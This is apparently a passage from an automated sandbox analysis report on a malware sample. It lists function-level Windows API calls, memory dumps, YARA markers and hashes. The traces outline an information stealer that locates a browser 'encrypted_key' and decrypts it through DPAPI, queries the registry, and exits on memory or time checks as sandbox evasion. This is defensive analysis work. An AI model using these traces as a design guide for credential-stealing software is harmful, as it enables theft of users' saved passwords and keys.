                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                            • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                            • lstrcatA.KERNEL32(?,00A6DF60), ref: 004151FB
                                            • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                              • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                              • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID: cA
                                            • API String ID: 2667927680-2872761854
                                            • Opcode ID: b403d34ea9d62d950dcb6905ec4e444727b63703994a5400a01d4a597f8bfd92
                                            • Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
                                            • Opcode Fuzzy Hash: b403d34ea9d62d950dcb6905ec4e444727b63703994a5400a01d4a597f8bfd92
                                            • Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023F14A5
                                            • __aulldiv.LIBCMT ref: 023F14BF
                                            • __aulldiv.LIBCMT ref: 023F14CD
                                            • ExitProcess.KERNEL32 ref: 023F14FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction ID: d68f0186ba068bd63cd9c8fb7a60d9249f5affa8157eab2e858dbbcbfd181c4e
                                            • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction Fuzzy Hash: 1B016DB0E54308EAEF50EBD0EC89B9DBB79AF4070AF208459E709B62C0D77495848B55
                                            APIs
                                            • memcmp.MSVCRT(?,0042124C,00000003), ref: 023FA7E4
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • memcmp.MSVCRT(?,004210FC,00000003), ref: 023FA839
                                            • memset.MSVCRT ref: 023FA872
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 023FA8CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcmp$AllocLocallstrcpymemset
                                            • String ID: @
                                            • API String ID: 631489823-2766056989
                                            • Opcode ID: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                            • Instruction ID: 3d4b9b60c5cd9d64d39a3d80d8bd239f7d5e951cff4a3e4ce311a4ee91db940b
                                            • Opcode Fuzzy Hash: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                            • Instruction Fuzzy Hash: 21514B30A10358EFDB28DFA4EC85FED77B6AF54304F008129EA096B590EB746A49CF50
                                            APIs
                                            • strtok_s.MSVCRT ref: 00410FE8
                                            • strtok_s.MSVCRT ref: 0041112D
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: 9e9d72db176d525f393edc8e7c5273babc13eaabf51b3923ecac453cd6a378d5
                                            • Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
                                            • Opcode Fuzzy Hash: 9e9d72db176d525f393edc8e7c5273babc13eaabf51b3923ecac453cd6a378d5
                                            • Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                              • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                              • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                              • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                              • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                              • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                              • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                            • String ID: $"encrypted_key":"$DPAPI
                                            • API String ID: 3731072634-738592651
                                            • Opcode ID: 5b78046f85af627c09a299ab182c71b3d4e9139a28e8ef8ebe0ef0d4724f4f60
                                            • Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
                                            • Opcode Fuzzy Hash: 5b78046f85af627c09a299ab182c71b3d4e9139a28e8ef8ebe0ef0d4724f4f60
                                            • Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CodeInfoPageValidmemset
                                            • String ID:
                                            • API String ID: 703783727-0
                                            • Opcode ID: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                            • Instruction ID: 33c257d7b0c51ffae5c9111947613386b53f2f525209da4000207ce3f4115818
                                            • Opcode Fuzzy Hash: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                            • Instruction Fuzzy Hash: F731AF20E08251DAEB259FB588D437ABFA0EF4A314F1485BFD8958F2D1C738C48ACB51
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                            • String ID:
                                            • API String ID: 3136044242-0
                                            • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                            • Instruction ID: 3ea30cf567314d9350c8606de6e264d4d23ef4f393d946692bb949bb72894c85
                                            • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                            • Instruction Fuzzy Hash: 902182B2900615AFDB229F95CC8CABF7A6AEB95B94F05411BF89867210C7308D418FD2
                                            APIs
                                            • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,00A6DD90,?,004210F4,?,00000000,?), ref: 00416C0C
                                            • sscanf.NTDLL ref: 00416C39
                                            • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,00A6DD90,?,004210F4), ref: 00416C52
                                            • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00A6DD90,?,004210F4), ref: 00416C60
                                            • ExitProcess.KERNEL32 ref: 00416C7A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID:
                                            • API String ID: 2533653975-0
                                            • Opcode ID: 0286e8e563faf4f9dba9a435e5910b50e17e840f8aa4026298b4842835600f94
                                            • Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
                                            • Opcode Fuzzy Hash: 0286e8e563faf4f9dba9a435e5910b50e17e840f8aa4026298b4842835600f94
                                            • Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69
                                            APIs
                                            • GetSystemTime.KERNEL32(?), ref: 02406E73
                                            • sscanf.NTDLL ref: 02406EA0
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02406EB9
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02406EC7
                                            • ExitProcess.KERNEL32 ref: 02406EE1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID:
                                            • API String ID: 2533653975-0
                                            • Opcode ID: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                            • Instruction ID: 627074db41a5faacdc93ea66a346382c444d45f3695633fa45a023b842bb0e78
                                            • Opcode Fuzzy Hash: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                            • Instruction Fuzzy Hash: 6521DCB5D14219ABCF14DFE4E8859EEB7BAFF48300F04852EE516E3250EB349644CB65
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                            • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                            • RegOpenKeyExA.ADVAPI32(80000002,00A6A4D0,00000000,00020119,?), ref: 00417FEE
                                            • RegQueryValueExA.ADVAPI32(?,00A71870,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                            • RegCloseKey.ADVAPI32(?), ref: 00418022
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
                                            • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0240822E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02408235
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6BD4,00000000,00020119,?), ref: 02408255
                                            • RegQueryValueExA.ADVAPI32(?,006D6EEC,00000000,00000000,000000FF,000000FF), ref: 02408276
                                            • RegCloseKey.ADVAPI32(?), ref: 02408289
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction ID: 534759f952f09075195cd7266f4e00f45ed6e1814ec4141559cf543333b7d346
                                            • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction Fuzzy Hash: 0D114FB1E45606EBD700CFD4DD85FABBBB9EB48B11F10422AF615AA280D7745940CBA1
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02407B2B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02407B32
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,02407AB0), ref: 02407B52
                                            • RegQueryValueExA.ADVAPI32(02407AB0,00420AB4,00000000,00000000,?,000000FF), ref: 02407B71
                                            • RegCloseKey.ADVAPI32(02407AB0), ref: 02407B7B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction ID: 6f6364a00e7aacc8d78b31e9f579223503d03f8e0427aa958351dd3b921523a0
                                            • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction Fuzzy Hash: 8B01FFB5E45309BBDB00DBE4DC49FAEB779EF44701F10459AF605A6280E774AA40CB91
                                            APIs
                                            • StrStrA.SHLWAPI(00A709A0,00000000,00000000,?,00409F71,00000000,00A709A0,00000000), ref: 004193FC
                                            • lstrcpyn.KERNEL32(006D7580,00A709A0,00A709A0,?,00409F71,00000000,00A709A0), ref: 00419420
                                            • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,00A709A0), ref: 00419437
                                            • wsprintfA.USER32 ref: 00419457
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID: %s%s
                                            • API String ID: 1206339513-3252725368
                                            • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
                                            • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96
                                            APIs
                                            • StrStrA.SHLWAPI(\nm,00000000,00000000,?,023FA1D8,00000000,006D6E5C,00000000), ref: 02409663
                                            • lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,023FA1D8,00000000,006D6E5C), ref: 02409687
                                            • lstrlen.KERNEL32(00000000,?,023FA1D8,00000000,006D6E5C), ref: 0240969E
                                            • wsprintfA.USER32 ref: 024096BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID: \nm
                                            • API String ID: 1206339513-1385846026
                                            • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction ID: a7161df95b1f55d749a4cdd5c5d7dca0b7fec95d19483eb742e1cc411ce016aa
                                            • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction Fuzzy Hash: 36011E75914108FFCB04DFA8DD84EAE7B79EF48704F108649F9098B341EB31AA40CB96
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                            • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                            • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F151B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F1522
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 023F153E
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 023F155C
                                            • RegCloseKey.ADVAPI32(?), ref: 023F1566
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction ID: 9afd24ac0df3b3eb8188c80a1505c8317a7f2ade59110260f675a2f5f492d49b
                                            • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction Fuzzy Hash: AE01E179E45209BFDB04DFD4DC49FAE7779EB48701F104199FA0597280E770AA008B91
                                            APIs
                                            • __getptd.LIBCMT ref: 0041CA7E
                                              • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                              • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                            • __getptd.LIBCMT ref: 0041CA95
                                            • __amsg_exit.LIBCMT ref: 0041CAA3
                                            • __lock.LIBCMT ref: 0041CAB3
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                            • Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
                                            • Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                            • Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE
                                            APIs
                                            • __getptd.LIBCMT ref: 0240CCE5
                                              • Part of subcall function 0240C507: __getptd_noexit.LIBCMT ref: 0240C50A
                                              • Part of subcall function 0240C507: __amsg_exit.LIBCMT ref: 0240C517
                                            • __getptd.LIBCMT ref: 0240CCFC
                                            • __amsg_exit.LIBCMT ref: 0240CD0A
                                            • __lock.LIBCMT ref: 0240CD1A
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0240CD2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                            • Instruction ID: cb56f305c95a226c4ed20be87016e02a61504f774e37a5620efff59435595005
                                            • Opcode Fuzzy Hash: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                            • Instruction Fuzzy Hash: 01F01231904710DAD721FB6AD8C1B5E36919F44758F21437FD8049A6D0CB7465C1DE9A
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
